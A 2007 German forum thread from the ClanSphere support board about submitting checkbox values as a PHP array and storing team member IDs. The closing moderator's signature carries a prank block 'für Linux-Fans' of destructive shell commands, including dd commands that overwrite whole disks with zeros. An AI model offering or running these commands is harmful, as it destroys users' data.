Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 3
Seite [1]
Franzel


Beginner




Beiträge: 13
# Thema - 09.07.2007 um 17:22 Uhr
servus alle zusammen,

Ich mal wieder (ich bekomme langsam nen schlechtes gewissen, hoffe ich nerve nicht zu sehr^^).

Fooolgendes Problem.

Ich habe bei mir eine Tabelle mit bestimmten Teams. Diesen Teams möchte ich jetzt Member zuweisen.

Habe mir das wieder so gedacht, dass ich bei den Teams eine Spalte namens "members_ids" habe und hier dann die ids in Reihe, durch ein Leerzeichen getrennt speichere also z.B. so: 1 5 6 10 15.

Um soweit so gut. Mit dem auslesen habe ich auch keine Schwierigkeiten, jedoch mit dem eintragen.

Wollte das ganze über Checkboxen realisieren.
Nun habe ich aber glaube ich noch nicht so ganz verstanden, wie checkboxen ihre werte übertragen bzw. was die Funktion cs_subtemplate mit den namen macht.

Ich habe das so versucht, wie ich es von anderen PHP-Foren kenne. Habe also jedem input den namen "member[]" gegeben und dem value dann eben immer die entsprechende ID. (das ganze in einer speilt sich innerhalb einer for-Schleife ab)

Normalerweise erstellt PHP ja damit dann ein Array namens "member" in dem alle ID'S die angehakt sind gespeichert sind und diesen Array kann man dann mit foreach() aufschlüsseln.

In der Praxis sieht das aber irgendwie anders aus.
Wenn ich dass bei CS mache, erstellt er mir kein array (dazu ist zu sagen, dass ich die gesamte Struktur in einer tpl datei anlege und dann mit cs_subtemplate() lade.)
sondern überträgt nur die variable "team[]" mit dem wert der letzten ID.
Somit greift natürlich auch keine der nachfolgenden funktionen.

Einen wirklichen Ansatz meiner seits kann ich nicht geben, da ich wie gesagt das ganze noch nicht so recht begriffen habe.

Ich hoffe ihr wisst worauf ich hinaus will und dass es irgendjemanden hier gibt, der mir helfen kann

Danke schonmal.

Franzel

Inaktiv
Jay1


Beginner



Herkunft: München
Beiträge: 15
# Antwort: 1 - 10.07.2007 um 09:42 Uhr
Auch wenn ich mit clansphere funktionalitäten nix am hut habe, vielleicht ein kleiner Tip meinerseits zum grundlegenden Aufbau:

Kann jeder Member nur in einem Team sein?
Dann solltest die Teamid einfach in der Membertabelle speichern.

Wenn ein Member in mehreren Teams sein kann, also eine n:m relation vorliegt, dann solltest eher eine Relationstabelle anlegen (1 Spalte für die TeamID, 1 Spalte für die MemberID). Da kannst dann schön flott drüber joinen.

Ansonsten kann ich dir leider auch nur bestätigen das deine Ausführungen zum Thema Checkboxen als Array stimmen.


Inaktiv
|
Franzel
Thread-Ersteller


Beginner




Beiträge: 13
# Antwort: 2 - 10.07.2007 um 19:03 Uhr
so, nach weiterem rumprobieren hab ichs endlich gelöst.

Hat eigentlich so funktioniert wie ichs gelesen hatte, weiß auch nicht so recht warum das jetzt funktioniert.

Falls es jemanden interessiert:

dem input-Feld z.B. den namen "teams[]" geben. dann erstellt PHP automatisch ein Array in das alle werte reingespeichert werden.

Im anschluss kann man das ganze mit einer foreach-Schleife aufschlüsseln.

Ich wollte das ganze ja dann in einem string haben. Also sieht meine schleife so aus:

 
1.
2.
3.
4.
5.
6.
7.
8.
1. / 2. / ... 
<?php 

$team 
$_POST['teams'] ;
     foreach (
$team as $key=>$element) {
    
$ausgabe.=$element;
  }

 
?>


@ Jav1 : danke für die Hilfe, aber da bei dem Teil nur Teams von max. 2 Speilern sind, und diese auch nur in einer einzigen Übersicht auftauchen, ist es glaub ich unnötig extra ne neue Tabelle aufzustellen.
hab das ganze jetzt in einer zeile gespeichert und fummel das dann mit explode auseinander
trotzdem danke

kann geclosed werden.

Franzel


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 3 - 10.07.2007 um 20:29 Uhr
./closed


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 3
Seite [1]


Sie müssen sich registrieren, um zu antworten.